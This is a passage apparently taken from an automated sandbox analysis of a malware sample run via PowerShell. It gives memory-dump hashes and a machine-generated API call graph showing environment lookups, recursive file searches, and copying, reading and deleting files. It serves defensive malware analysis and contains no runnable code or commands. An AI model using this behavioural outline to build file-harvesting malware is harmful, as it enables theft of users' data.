                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$(f\l$(f\l
                                                                                        • API String ID: 0-3507803965
                                                                                        • Opcode ID: ef0cbc25ef283d5d92e4cac5fb495f2796944554dced46aeeccb871f7699340d
                                                                                        • Instruction ID: 93954bd7b9b88d32d3ecbdd1db6a6e76b9b8584a70f2e6e8f43667db927ab8e6
                                                                                        • Opcode Fuzzy Hash: ef0cbc25ef283d5d92e4cac5fb495f2796944554dced46aeeccb871f7699340d
                                                                                        • Instruction Fuzzy Hash: C1A17975E00A00CFDB60CF94C841A6EB7F2BF89354F14C56ED81AAB755CB32A942CB91
                                                                                        Function 06F7E644 Relevance: 5.2, Strings: 4, Instructions: 167COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$4Yl$tLNk
                                                                                        • API String ID: 0-2523044507
                                                                                        • Opcode ID: a16e3ed15605273d5698982c8f80272fa3c6fa45fd1ceb340429e29a19880a82
                                                                                        • Instruction ID: 2feb7c8fd371595c6a9c627e36301c22bccca25104b5949d06c590994fdf7160
                                                                                        • Opcode Fuzzy Hash: a16e3ed15605273d5698982c8f80272fa3c6fa45fd1ceb340429e29a19880a82
                                                                                        • Instruction Fuzzy Hash: 87517E35F04205DFD764CF94C841E6ABBF2AF89314F1980ABE415AB352CB32E842CB91

                                                                                        Execution Graph

                                                                                        Execution Coverage:2%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:2.7%
                                                                                        Total number of Nodes:1648
                                                                                        Total number of Limit Nodes:1
                                                                                        execution_graph 7109 22323eb3 7112 22325411 7109->7112 7113 2232541d _abort 7112->7113 7114 22325af6 _abort 38 API calls 7113->7114 7115 22325422 7114->7115 7116 223255a8 _abort 38 API calls 7115->7116 7117 2232544c 7116->7117 5978 22325630 5979 2232563b 5978->5979 5981 22325664 5979->5981 5982 22325660 5979->5982 5984 22325eb7 5979->5984 5991 22325688 5981->5991 5985 22325c45 _abort 5 API calls 5984->5985 5986 22325ede 5985->5986 5987 22325ee7 5986->5987 5988 22325efc InitializeCriticalSectionAndSpinCount 5986->5988 5989 22322ada _ValidateLocalCookies 5 API calls 5987->5989 5988->5987 5990 22325f13 5989->5990 5990->5979 5992 223256b4 5991->5992 5993 22325695 5991->5993 5992->5982 5994 2232569f RtlDeleteCriticalSection 5993->5994 5994->5992 5994->5994 6406 22323370 6417 22323330 6406->6417 6418 22323342 6417->6418 6419 2232334f 6417->6419 6420 22322ada _ValidateLocalCookies 5 API calls 6418->6420 6420->6419 7404 223263f0 7405 22326400 7404->7405 7410 22326416 7404->7410 7406 22326368 _free 20 API calls 7405->7406 7407 22326405 7406->7407 7408 223262ac _abort 26 API calls 7407->7408 7419 2232640f 7408->7419 7409 22326480 7434 22324e76 7409->7434 7410->7409 7416 22326561 7410->7416 7423 22326580 7410->7423 7412 223264e5 7414 223264ee 7412->7414 7420 22326573 7412->7420 7440 223285eb 7412->7440 7415 2232571e _free 20 API calls 7414->7415 7415->7416 7449 2232679a 7416->7449 7421 223262bc _abort 11 API calls 7420->7421 7422 2232657f 7421->7422 7424 2232658c 7423->7424 7424->7424 7425 2232637b _abort 20 API calls 7424->7425 7426 223265ba 7425->7426 7427 223285eb 26 API calls 7426->7427 7428 223265e6 7427->7428 7429 223262bc _abort 11 API calls 7428->7429 7430 22326615 ___scrt_fastfail 7429->7430 7431 223266b6 FindFirstFileExA 7430->7431 7432 22326705 7431->7432 7433 22326580 26 API calls 7432->7433 7435 22324e87 7434->7435 7436 22324e8b 7434->7436 7435->7412 7436->7435 7437 2232637b _abort 20 API calls 7436->7437 7438 22324eb9 7437->7438 7439 2232571e _free 20 API calls 7438->7439 7439->7435 7441 2232853a 7440->7441 7443 22328554 7441->7443 7445 2232854f 7441->7445 7447 2232858b 7441->7447 7442 22326368 _free 20 API calls 7444 2232857a 7442->7444 7443->7412 7446 223262ac _abort 26 API calls 7444->7446 7445->7442 7445->7443 7446->7443 7447->7443 7448 22326368 _free 20 API calls 7447->7448 7448->7444 7450 223267a4 7449->7450 7451 223267b4 7450->7451 7452 2232571e _free 20 API calls 7450->7452 7453 2232571e _free 20 API calls 7451->7453 7452->7450 7454 223267bb 7453->7454 7454->7419 6421 22329e71 6422 22329e95 6421->6422 6423 22329eae 6422->6423 6425 2232ac6b __startOneArgErrorHandling 6422->6425 6426 22329ef8 6423->6426 6429 2232aa53 6423->6429 6428 2232acad __startOneArgErrorHandling 6425->6428 6439 2232b2f0 6425->6439 6430 2232aa70 RtlDecodePointer 6429->6430 6432 2232aa80 6429->6432 6430->6432 6431 22322ada _ValidateLocalCookies 5 API calls 6434 2232ac67 6431->6434 6433 2232ab0d 6432->6433 6435 2232ab02 6432->6435 6437 2232aab7 6432->6437 6433->6435 6436 22326368 _free 20 API calls 6433->6436 6434->6426 6435->6431 6436->6435 6437->6435 6438 22326368 _free 20 API calls 6437->6438 6438->6435 6440 2232b329 __startOneArgErrorHandling 6439->6440 6442 2232b350 __startOneArgErrorHandling 6440->6442 6450 2232b5c1 6440->6450 6443 2232b393 6442->6443 6444 2232b36e 6442->6444 6463 2232b8b2 6443->6463 6454 2232b8e1 6444->6454 6447 2232b38e __startOneArgErrorHandling 6448 22322ada _ValidateLocalCookies 5 API calls 6447->6448 6449 2232b3b7 6448->6449 6449->6428 6451 2232b5ec __raise_exc 6450->6451 6452 2232b7e5 RaiseException 6451->6452 6453 2232b7fd 6452->6453 6453->6442 6455 2232b8f0 6454->6455 6456 2232b964 __startOneArgErrorHandling 6455->6456 6457 2232b90f __startOneArgErrorHandling 6455->6457 6459 2232b8b2 __startOneArgErrorHandling 20 API calls 6456->6459 6470 223278a3 6457->6470 6462 2232b95d 6459->6462 6461 2232b8b2 __startOneArgErrorHandling 20 API calls 6461->6462 6462->6447 6464 2232b8d4 6463->6464 6465 2232b8bf 6463->6465 6466 22326368 _free 20 API calls 6464->6466 6467 22326368 _free 20 API calls 6465->6467 6468 2232b8d9 6465->6468 6466->6468 6469 2232b8cc 6467->6469 6468->6447 6469->6447 6473 223278cb 6470->6473 6471 22322ada _ValidateLocalCookies 5 API calls 6472 223278e8 6471->6472 6472->6461 6472->6462 6473->6471 7122 22329db8 7123 22329dbf 7122->7123 7124 22329e20 7123->7124 7128 22329ddf 7123->7128 7125 2232aa17 21 API calls 7124->7125 7126 2232a90e 7124->7126 7127 22329e6e 7125->7127 7128->7126 7129 2232aa17 21 API calls 7128->7129 7130 2232a93e 7129->7130 5995 22321f3f 5996 22321f4b ___scrt_is_nonwritable_in_current_image 5995->5996 6013 2232247c 5996->6013 5998 22321f52 5999 22322041 5998->5999 6000 22321f7c 5998->6000 6007 22321f57 ___scrt_is_nonwritable_in_current_image 5998->6007 6040 22322639 IsProcessorFeaturePresent 5999->6040 6024 223223de 6000->6024 6003 22322048 6004 22321f8b __RTC_Initialize 6004->6007 6027 223222fc RtlInitializeSListHead 6004->6027 6006 22321f99 ___scrt_initialize_default_local_stdio_options 6028 223246c5 6006->6028 6011 22321fb8 6011->6007 6036 22324669 6011->6036 6014 22322485 6013->6014 6044 22322933 IsProcessorFeaturePresent 6014->6044 6018 22322496 6019 2232249a 6018->6019 6055 223253c8 6018->6055 6019->5998 6022 223224b1 6022->5998 6129 223224b5 6024->6129 6026 223223e5 6026->6004 6027->6006 6031 223246dc 6028->6031 6029 22322ada _ValidateLocalCookies 5 API calls 6030 22321fad 6029->6030 6030->6007 6032 223223b3 6030->6032 6031->6029 6033 223223b8 ___scrt_release_startup_lock 6032->6033 6034 22322933 ___isa_available_init IsProcessorFeaturePresent 6033->6034 6035 223223c1 6033->6035 6034->6035 6035->6011 6039 22324698 6036->6039 6037 22322ada _ValidateLocalCookies 5 API calls 6038 223246c1 6037->6038 6038->6007 6039->6037 6041 2232264e ___scrt_fastfail 6040->6041 6042 223226f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6041->6042 6043 22322744 ___scrt_fastfail 6042->6043 6043->6003 6045 22322491 6044->6045 6046 223234ea 6045->6046 6047 223234ef ___vcrt_initialize_winapi_thunks 6046->6047 6066 22323936 6047->6066 6051 22323510 6051->6018 6052 22323505 6052->6051 6080 22323972 6052->6080 6054 223234fd 6054->6018 6121 22327457 6055->6121 6058 22323529 6059 22323532 6058->6059 6060 22323543 6058->6060 6061 2232391b ___vcrt_uninitialize_ptd 6 API calls 6059->6061 6060->6019 6062 22323537 6061->6062 6063 22323972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6062->6063 6064 2232353c 6063->6064 6125 22323c50 6064->6125 6067 2232393f 6066->6067 6069 22323968 6067->6069 6071 223234f9 6067->6071 6084 22323be0 6067->6084 6070 22323972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6069->6070 6070->6071 6071->6054 6072 223238e8 6071->6072 6102 22323af1 6072->6102 6075 223238fd 6075->6052 6078 22323918 6078->6052 6081 2232399c 6080->6081 6082 2232397d 6080->6082 6081->6054 6083 22323987 RtlDeleteCriticalSection 6082->6083 6083->6081 6083->6083 6089 22323a82 6084->6089 6086 22323bfa 6087 22323c18 InitializeCriticalSectionAndSpinCount 6086->6087 6088 22323c03 6086->6088 6087->6088 6088->6067 6090 22323aaa 6089->6090 6094 22323aa6 __crt_fast_encode_pointer 6089->6094 6090->6094 6095 223239be 6090->6095 6093 22323ac4 GetProcAddress 6093->6094 6094->6086 6100 223239cd try_get_first_available_module 6095->6100 6096 22323a77 6096->6093 6096->6094 6097 223239ea LoadLibraryExW 6098 22323a05 GetLastError 6097->6098 6097->6100 6098->6100 6099 22323a60 FreeLibrary 6099->6100 6100->6096 6100->6097 6100->6099 6101 22323a38 LoadLibraryExW 6100->6101 6101->6100 6103 22323a82 try_get_function 5 API calls 6102->6103 6104 22323b0b 6103->6104 6105 22323b24 TlsAlloc 6104->6105 6106 223238f2 6104->6106 6106->6075 6107 22323ba2 6106->6107 6108 22323a82 try_get_function 5 API calls 6107->6108 6109 22323bbc 6108->6109 6110 22323bd7 TlsSetValue 6109->6110 6111 2232390b 6109->6111 6110->6111 6111->6078 6112 2232391b 6111->6112 6113 2232392b 6112->6113 6114 22323925 6112->6114 6113->6075 6116 22323b2c 6114->6116 6117 22323a82 try_get_function 5 API calls 6116->6117 6118 22323b46 6117->6118 6119 22323b5e TlsFree 6118->6119 6120 22323b52 6118->6120 6119->6120 6120->6113 6124 22327470 6121->6124 6122 22322ada _ValidateLocalCookies 5 API calls 6123 223224a3 6122->6123 6123->6022 6123->6058 6124->6122 6126 22323c59 6125->6126 6128 22323c7f 6125->6128 6127 22323c69 FreeLibrary 6126->6127 6126->6128 6127->6126 6128->6060 6130 223224c4 6129->6130 6131 223224c8 6129->6131 6130->6026 6132 22322639 ___scrt_fastfail 4 API calls 6131->6132 6134 223224d5 ___scrt_release_startup_lock 6131->6134 6133 22322559 6132->6133 6134->6026 7131 223267bf 7136 223267f4 7131->7136 7134 223267db 7135 2232571e _free 20 API calls 7135->7134 7137 22326806 7136->7137 7146 223267cd 7136->7146 7138 22326836 7137->7138 7139 2232680b 7137->7139 7138->7146 7147 223271d6 7138->7147 7140 2232637b _abort 20 API calls 7139->7140 7141 22326814 7140->7141 7143 2232571e _free 20 API calls 7141->7143 7143->7146 7144 22326851 7145 2232571e _free 20 API calls 7144->7145 7145->7146 7146->7134 7146->7135 7148 223271e1 7147->7148 7149 22327209 7148->7149 7150 223271fa 7148->7150 7151 22327218 7149->7151 7156 22328a98 7149->7156 7152 22326368 _free 20 API calls 7150->7152 7163 22328acb 7151->7163 7155 223271ff ___scrt_fastfail 7152->7155 7155->7144 7157 22328aa3 7156->7157 7158 22328ab8 RtlSizeHeap 7156->7158 7159 22326368 _free 20 API calls 7157->7159 7158->7151 7160 22328aa8 7159->7160 7161 223262ac _abort 26 API calls 7160->7161 7162 22328ab3 7161->7162 7162->7151 7164 22328ae3 7163->7164 7165 22328ad8 7163->7165 7167 22328aeb 7164->7167 7173 22328af4 _abort 7164->7173 7175 223256d0 7165->7175 7168 2232571e _free 20 API calls 7167->7168 7171 22328ae0 7168->7171 7169 22328af9 7172 22326368 _free 20 API calls 7169->7172 7170 22328b1e RtlReAllocateHeap 7170->7171 7170->7173 7171->7155 7172->7171 7173->7169 7173->7170 7174 2232474f _abort 7 API calls 7173->7174 7174->7173 7176 2232570e 7175->7176 7180 223256de _abort 7175->7180 7177 22326368 _free 20 API calls 7176->7177 7179 2232570c 7177->7179 7178 223256f9 RtlAllocateHeap 7178->7179 7178->7180 7179->7171 7180->7176 7180->7178 7181 2232474f _abort 7 API calls 7180->7181 7181->7180 7455 22325bff 7463 22325d5c 7455->7463 7458 22325c13 7459 22325b7a _abort 20 API calls 7460 22325c1b 7459->7460 7461 22325c28 7460->7461 7462 22325c2b 11 API calls 7460->7462 7462->7458 7464 22325c45 _abort 5 API calls 7463->7464 7465 22325d83 7464->7465 7466 22325d9b TlsAlloc 7465->7466 7467 22325d8c 7465->7467 7466->7467 7468 22322ada _ValidateLocalCookies 5 API calls 7467->7468 7469 22325c09 7468->7469 7469->7458 7469->7459 6135 2232543d 6136 22325440 6135->6136 6139 223255a8 6136->6139 6150 22327613 6139->6150 6142 223255b8 6144 223255c2 IsProcessorFeaturePresent 6142->6144 6145 223255e0 6142->6145 6147 223255cd 6144->6147 6186 22324bc1 6145->6186 6180 223260e2 6147->6180 6189 22327581 6150->6189 6153 2232766e 6154 2232767a _abort 6153->6154 6155 22325b7a _abort 20 API calls 6154->6155 6160 223276a7 _abort 6154->6160 6161 223276a1 _abort 6154->6161 6155->6161 6156 223276f3 6157 22326368 _free 20 API calls 6156->6157 6159 223276f8 6157->6159 6158 223276d6 6235 2232bdc9 6158->6235 6203 223262ac 6159->6203 6166 2232771f 6160->6166 6206 22325671 RtlEnterCriticalSection 6160->6206 6161->6156 6161->6158 6161->6160 6167 2232777e 6166->6167 6169 22327776 6166->6169 6177 223277a9 6166->6177 6207 223256b9 RtlLeaveCriticalSection 6166->6207 6167->6177 6208 22327665 6167->6208 6172 22324bc1 _abort 28 API calls 6169->6172 6172->6167 6176 22327665 _abort 38 API calls 6176->6177 6211 2232782e 6177->6211 6178 2232780c 6178->6158 6179 22325af6 _abort 38 API calls 6178->6179 6179->6158 6181 223260fe ___scrt_fastfail 6180->6181 6182 2232612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6181->6182 6185 223261fb ___scrt_fastfail 6182->6185 6183 22322ada _ValidateLocalCookies 5 API calls 6184 22326219 6183->6184 6184->6145 6185->6183 6254 2232499b 6186->6254 6192 22327527 6189->6192 6191 223255ad 6191->6142 6191->6153 6193 22327533 ___scrt_is_nonwritable_in_current_image 6192->6193 6198 22325671 RtlEnterCriticalSection 6193->6198 6195 22327541 6199 22327575 6195->6199 6197 22327568 _abort 6197->6191 6198->6195 6202 223256b9 RtlLeaveCriticalSection 6199->6202 6201 2232757f 6201->6197 6202->6201 6238 22326231 6203->6238 6205 223262b8 6205->6158 6206->6166 6207->6169 6209 22325af6 _abort 38 API calls 6208->6209 6210 2232766a 6209->6210 6210->6176 6212 22327834 6211->6212 6213 223277fd 6211->6213 6253 223256b9 RtlLeaveCriticalSection 6212->6253 6213->6158 6213->6178 6215 22325af6 GetLastError 6213->6215 6216 22325b12 6215->6216 6217 22325b0c 6215->6217 6219 2232637b _abort 20 API calls 6216->6219 6221 22325b61 SetLastError 6216->6221 6218 22325e08 _abort 11 API calls 6217->6218 6218->6216 6220 22325b24 6219->6220 6222 22325b2c 6220->6222 6223 22325e5e _abort 11 API calls 6220->6223 6221->6178 6225 2232571e _free 20 API calls 6222->6225 6224 22325b41 6223->6224 6224->6222 6227 22325b48 6224->6227 6226 22325b32 6225->6226 6228 22325b6d SetLastError 6226->6228 6229 2232593c _abort 20 API calls 6227->6229 6231 223255a8 _abort 35 API calls 6228->6231 6230 22325b53 6229->6230 6232 2232571e _free 20 API calls 6230->6232 6233 22325b79 6231->6233 6234 22325b5a 6232->6234 6234->6221 6234->6228 6236 22322ada _ValidateLocalCookies 5 API calls 6235->6236 6237 2232bdd4 6236->6237 6237->6237 6239 22325b7a _abort 20 API calls 6238->6239 6240 22326247 6239->6240 6241 223262a6 6240->6241 6242 22326255 6240->6242 6249 223262bc IsProcessorFeaturePresent 6241->6249 6246 22322ada _ValidateLocalCookies 5 API calls 6242->6246 6244 223262ab 6245 22326231 _abort 26 API calls 6244->6245 6247 223262b8 6245->6247 6248 2232627c 6246->6248 6247->6205 6248->6205 6250 223262c7 6249->6250 6251 223260e2 _abort 8 API calls 6250->6251 6252 223262dc GetCurrentProcess TerminateProcess 6251->6252 6252->6244 6253->6213 6255 223249a7 _abort 6254->6255 6256 223249bf 6255->6256 6276 22324af5 GetModuleHandleW 6255->6276 6285 22325671 RtlEnterCriticalSection 6256->6285 6260 22324a65 6289 22324aa5 6260->6289 6264 22324a3c 6265 22324a54 6264->6265 6271 22324669 _abort 5 API calls 6264->6271 6272 22324669 _abort 5 API calls 6265->6272 6266 223249c7 6266->6260 6266->6264 6286 2232527a 6266->6286 6267 22324a82 6292 22324ab4 6267->6292 6268 22324aae 6270 2232bdc9 _abort 5 API calls 6268->6270 6274 22324ab3 6270->6274 6271->6265 6272->6260 6277 223249b3 6276->6277 6277->6256 6278 22324b39 GetModuleHandleExW 6277->6278 6279 22324b63 GetProcAddress 6278->6279 6280 22324b78 6278->6280 6279->6280 6281 22324b95 6280->6281 6282 22324b8c FreeLibrary 6280->6282 6283 22322ada _ValidateLocalCookies 5 API calls 6281->6283 6282->6281 6284 22324b9f 6283->6284 6284->6256 6285->6266 6300 22325132 6286->6300 6322 223256b9 RtlLeaveCriticalSection 6289->6322 6291 22324a7e 6291->6267 6291->6268 6323 22326025 6292->6323 6295 22324ae2 6298 22324b39 _abort 8 API calls 6295->6298 6296 22324ac2 GetPEB 6296->6295 6297 22324ad2 GetCurrentProcess TerminateProcess 6296->6297 6297->6295 6299 22324aea ExitProcess 6298->6299 6303 223250e1 6300->6303 6302 22325156 6302->6264 6304 223250ed ___scrt_is_nonwritable_in_current_image 6303->6304 6311 22325671 RtlEnterCriticalSection 6304->6311 6306 223250fb 6312 2232515a 6306->6312 6310 22325119 _abort 6310->6302 6311->6306 6313 22325182 6312->6313 6314 2232517a 6312->6314 6313->6314 6317 2232571e _free 20 API calls 6313->6317 6315 22322ada _ValidateLocalCookies 5 API calls 6314->6315 6316 22325108 6315->6316 6318 22325126 6316->6318 6317->6314 6321 223256b9 RtlLeaveCriticalSection 6318->6321 6320 22325130 6320->6310 6321->6320 6322->6291 6324 2232604a 6323->6324 6328 22326040 6323->6328 6325 22325c45 _abort 5 API calls 6324->6325 6325->6328 6326 22322ada _ValidateLocalCookies 5 API calls 6327 22324abe 6326->6327 6327->6295 6327->6296 6328->6326 7182 223281a0 7183 223281d9 7182->7183 7184 223281dd 7183->7184 7195 22328205 7183->7195 7185 22326368 _free 20 API calls 7184->7185 7186 223281e2 7185->7186 7187 223262ac _abort 26 API calls 7186->7187 7189 223281ed 7187->7189 7188 22322ada _ValidateLocalCookies 5 API calls 7190 22328536 7188->7190 7191 22322ada _ValidateLocalCookies 5 API calls 7189->7191 7193 223281f9 7191->7193 7194 22328529 7194->7188 7195->7194 7196 223280c0 7195->7196 7199 223280db 7196->7199 7197 22322ada _ValidateLocalCookies 5 API calls 7198 22328152 7197->7198 7198->7195 7199->7197 7470 2232a1e0 7473 2232a1fe 7470->7473 7472 2232a1f6 7477 2232a203 7473->7477 7474 2232aa53 21 API calls 7475 2232a42f 7474->7475 7475->7472 7476 2232a298 7476->7472 7477->7474 7477->7476 7200 223221a1 ___scrt_dllmain_exception_filter 7201 2232c7a7 7202 2232c7be 7201->7202 7207 2232c80d 7201->7207 7202->7207 7210 2232c7e6 GetModuleHandleA 7202->7210 7203 2232c872 7204 2232c835 GetModuleHandleA 7204->7207 7207->7203 7207->7204 7208 2232c85f GetProcAddress 7207->7208 7208->7207 7211 2232c7ef 7210->7211 7217 2232c80d 7210->7217 7219 2232c803 GetProcAddress 7211->7219 7213 2232c872 7214 2232c835 GetModuleHandleA 7214->7217 7217->7213 7217->7214 7218 2232c85f GetProcAddress 7217->7218 7218->7217 7223 2232c80d 7219->7223 7220 2232c835 GetModuleHandleA 7220->7223 7221 2232c872 7222 2232c85f GetProcAddress 7222->7223 7223->7220 7223->7221 7223->7222 6329 2232742b 6330 22327430 6329->6330 6332 22327453 6330->6332 6333 22328bae 6330->6333 6334 22328bdd 6333->6334 6335 22328bbb 6333->6335 6334->6330 6336 22328bd7 6335->6336 6337 22328bc9 RtlDeleteCriticalSection 6335->6337 6338 2232571e _free 20 API calls 6336->6338 6337->6336 6337->6337 6338->6334 6474 2232ac6b 6475 2232ac84 __startOneArgErrorHandling 6474->6475 6476 2232b2f0 21 API calls 6475->6476 6477 2232acad __startOneArgErrorHandling 6475->6477 6476->6477 6478 2232506f 6479 22325081 6478->6479 6480 22325087 6478->6480 6481 22325000 20 API calls 6479->6481 6481->6480 7224 223260ac 7225 223260dd 7224->7225 7227 223260b7 7224->7227 7226 223260c7 FreeLibrary 7226->7227 7227->7225 7227->7226 7228 22323c90 RtlUnwind 7478 223236d0 7479 223236e2 7478->7479 7481 223236f0 @_EH4_CallFilterFunc@8 7478->7481 7480 22322ada _ValidateLocalCookies 5 API calls 7479->7480 7480->7481 6482 22325351 6483 22325360 6482->6483 6487 22325374 6482->6487 6485 2232571e _free 20 API calls 6483->6485 6483->6487 6484 2232571e _free 20 API calls 6486 22325386 6484->6486 6485->6487 6488 2232571e _free 20 API calls 6486->6488 6487->6484 6489 22325399 6488->6489 6490 2232571e _free 20 API calls 6489->6490 6491 223253aa 6490->6491 6492 2232571e _free 20 API calls 6491->6492 6493 223253bb 6492->6493 7482 22324ed7 7483 22326d60 51 API calls 7482->7483 7484 22324ee9 7483->7484 7493 22327153 GetEnvironmentStringsW 7484->7493 7488 2232571e _free 20 API calls 7489 22324f29 7488->7489 7490 22324eff 7491 2232571e _free 20 API calls 7490->7491 7492 22324ef4 7491->7492 7492->7488 7494 2232716a 7493->7494 7504 223271bd 7493->7504 7495 22327170 WideCharToMultiByte 7494->7495 7498 2232718c 7495->7498 7495->7504 7496 223271c6 FreeEnvironmentStringsW 7497 22324eee 7496->7497 7497->7492 7505 22324f2f 7497->7505 7499 223256d0 21 API calls 7498->7499 7500 22327192 7499->7500 7501 223271af 7500->7501 7502 22327199 WideCharToMultiByte 7500->7502 7503 2232571e _free 20 API calls 7501->7503 7502->7501 7503->7504 7504->7496 7504->7497 7507 22324f44 7505->7507 7506 2232637b _abort 20 API calls 7516 22324f6b 7506->7516 7507->7506 7508 22324fcf 7509 2232571e _free 20 API calls 7508->7509 7510 22324fe9 7509->7510 7510->7490 7511 2232637b _abort 20 API calls 7511->7516 7512 22324fd1 7513 22325000 20 API calls 7512->7513 7515 22324fd7 7513->7515 7514 2232544d ___std_exception_copy 26 API calls 7514->7516 7518 2232571e _free 20 API calls 7515->7518 7516->7508 7516->7511 7516->7512 7516->7514 7517 22324ff3 7516->7517 7520 2232571e _free 20 API calls 7516->7520 7519 223262bc _abort 11 API calls 7517->7519 7518->7508 7521 22324fff 7519->7521 7520->7516 7522 223273d5 7523 223273e1 ___scrt_is_nonwritable_in_current_image 7522->7523 7534 22325671 RtlEnterCriticalSection 7523->7534 7525 223273e8 7535 22328be3 7525->7535 7527 223273f7 7533 22327406 7527->7533 7548 22327269 GetStartupInfoW 7527->7548 7530 22327417 _abort 7559 22327422 7533->7559 7534->7525 7536 22328bef ___scrt_is_nonwritable_in_current_image 7535->7536 7537 22328c13 7536->7537 7538 22328bfc 7536->7538 7562 22325671 RtlEnterCriticalSection 7537->7562 7539 22326368 _free 20 API calls 7538->7539 7541 22328c01 7539->7541 7542 223262ac _abort 26 API calls 7541->7542 7544 22328c0b _abort 7542->7544 7543 22328c4b 7570 22328c72 7543->7570 7544->7527 7545 22328c1f 7545->7543 7563 22328b34 7545->7563 7549 22327286 7548->7549 7550 22327318 7548->7550 7549->7550 7551 22328be3 27 API calls 7549->7551 7554 2232731f 7550->7554 7552 223272af 7551->7552 7552->7550 7553 223272dd GetFileType 7552->7553 7553->7552 7556 22327326 7554->7556 7555 22327369 GetStdHandle 7555->7556 7556->7555 7557 223273d1 7556->7557 7558 2232737c GetFileType 7556->7558 7557->7533 7558->7556 7574 223256b9 RtlLeaveCriticalSection 7559->7574 7561 22327429 7561->7530 7562->7545 7564 2232637b _abort 20 API calls 7563->7564 7566 22328b46 7564->7566 7565 22328b53 7567 2232571e _free 20 API calls 7565->7567 7566->7565 7568 22325eb7 11 API calls 7566->7568 7569 22328ba5 7567->7569 7568->7566 7569->7545 7573 223256b9 RtlLeaveCriticalSection 7570->7573 7572 22328c79 7572->7544 7573->7572 7574->7561 7229 22324a9a 7230 22325411 38 API calls 7229->7230 7231 22324aa2 7230->7231 5752 22321c5b 5753 22321c6b ___scrt_fastfail 5752->5753 5756 223212ee 5753->5756 5755 22321c87 5757 22321324 ___scrt_fastfail 5756->5757 5758 223213b7 GetEnvironmentVariableW 5757->5758 5782 223210f1 5758->5782 5761 223210f1 57 API calls 5762 22321465 5761->5762 5763 223210f1 57 API calls 5762->5763 5764 22321479 5763->5764 5765 223210f1 57 API calls 5764->5765 5766 2232148d 5765->5766 5767 223210f1 57 API calls 5766->5767 5768 223214a1 5767->5768 5769 223210f1 57 API calls 5768->5769 5770 223214b5 lstrlenW 5769->5770 5771 223214d2 5770->5771 5772 223214d9 lstrlenW 5770->5772 5771->5755 5773 223210f1 57 API calls 5772->5773 5774 22321501 lstrlenW lstrcatW 5773->5774 5775 223210f1 57 API calls 5774->5775 5776 22321539 lstrlenW lstrcatW 5775->5776 5777 223210f1 57 API calls 5776->5777 5778 2232156b lstrlenW lstrcatW 5777->5778 5779 223210f1 57 API calls 5778->5779 5780 2232159d lstrlenW lstrcatW 5779->5780 5781 223210f1 57 API calls 5780->5781 5781->5771 5783 22321118 ___scrt_fastfail 5782->5783 5784 22321129 lstrlenW 5783->5784 5795 22322c40 5784->5795 5787 22321177 lstrlenW FindFirstFileW 5789 223211a0 5787->5789 5790 223211e1 5787->5790 5788 22321168 lstrlenW 5788->5787 5791 223211c7 FindNextFileW 5789->5791 5792 223211aa 5789->5792 5790->5761 5791->5789 5794 223211da FindClose 5791->5794 5792->5791 5797 22321000 5792->5797 5794->5790 5796 22321148 lstrcatW lstrlenW 5795->5796 5796->5787 5796->5788 5798 22321022 ___scrt_fastfail 5797->5798 5799 223210af 5798->5799 5800 2232102f lstrcatW lstrlenW 5798->5800 5803 223210b5 lstrlenW 5799->5803 5804 223210ad 5799->5804 5801 2232105a lstrlenW 5800->5801 5802 2232106b lstrlenW 5800->5802 5801->5802 5814 22321e89 lstrlenW 5802->5814 5828 22321e16 5803->5828 5804->5792 5807 22321088 GetFileAttributesW 5807->5804 5809 2232109c 5807->5809 5808 223210ca 5808->5804 5810 22321e89 5 API calls 5808->5810 5809->5804 5820 2232173a 5809->5820 5811 223210df 5810->5811 5833 223211ea 5811->5833 5815 22322c40 ___scrt_fastfail 5814->5815 5816 22321ea7 lstrcatW lstrlenW 5815->5816 5817 22321ec2 5816->5817 5818 22321ed1 lstrcatW 5816->5818 5817->5818 5819 22321ec7 lstrlenW 5817->5819 5818->5807 5819->5818 5821 22321747 ___scrt_fastfail 5820->5821 5848 22321cca 5821->5848 5824 2232199f 5824->5804 5826 22321824 ___scrt_fastfail _strlen 5826->5824 5868 223215da 5826->5868 5829 22321e29 5828->5829 5832 22321e4c 5828->5832 5830 22321e2d lstrlenW 5829->5830 5829->5832 5831 22321e3f lstrlenW 5830->5831 5830->5832 5831->5832 5832->5808 5834 2232120e ___scrt_fastfail 5833->5834 5835 22321e89 5 API calls 5834->5835 5836 22321220 GetFileAttributesW 5835->5836 5837 22321246 5836->5837 5838 22321235 5836->5838 5839 22321e89 5 API calls 5837->5839 5838->5837 5840 2232173a 35 API calls 5838->5840 5841 22321258 5839->5841 5840->5837 5842 223210f1 56 API calls 5841->5842 5843 2232126d 5842->5843 5844 22321e89 5 API calls 5843->5844 5845 2232127f ___scrt_fastfail 5844->5845 5846 223210f1 56 API calls 5845->5846 5847 223212e6 5846->5847 5847->5804 5849 22321cf1 ___scrt_fastfail 5848->5849 5850 22321d0f CopyFileW CreateFileW 5849->5850 5851 22321d44 DeleteFileW 5850->5851 5852 22321d55 GetFileSize 5850->5852 5857 22321808 5851->5857 5853 22321ede 22 API calls 5852->5853 5854 22321d66 ReadFile 5853->5854 5855 22321d94 CloseHandle DeleteFileW 5854->5855 5856 22321d7d CloseHandle DeleteFileW 5854->5856 5855->5857 5856->5857 5857->5824 5858 22321ede 5857->5858 5860 2232222f 5858->5860 5861 2232224e 5860->5861 5864 22322250 5860->5864 5876 2232474f 5860->5876 5881 223247e5 5860->5881 5861->5826 5863 22322908 5865 223235d2 __CxxThrowException@8 RaiseException 5863->5865 5864->5863 5888 223235d2 5864->5888 5867 22322925 5865->5867 5867->5826 5869 2232160c _strcat _strlen 5868->5869 5870 2232163c lstrlenW 5869->5870 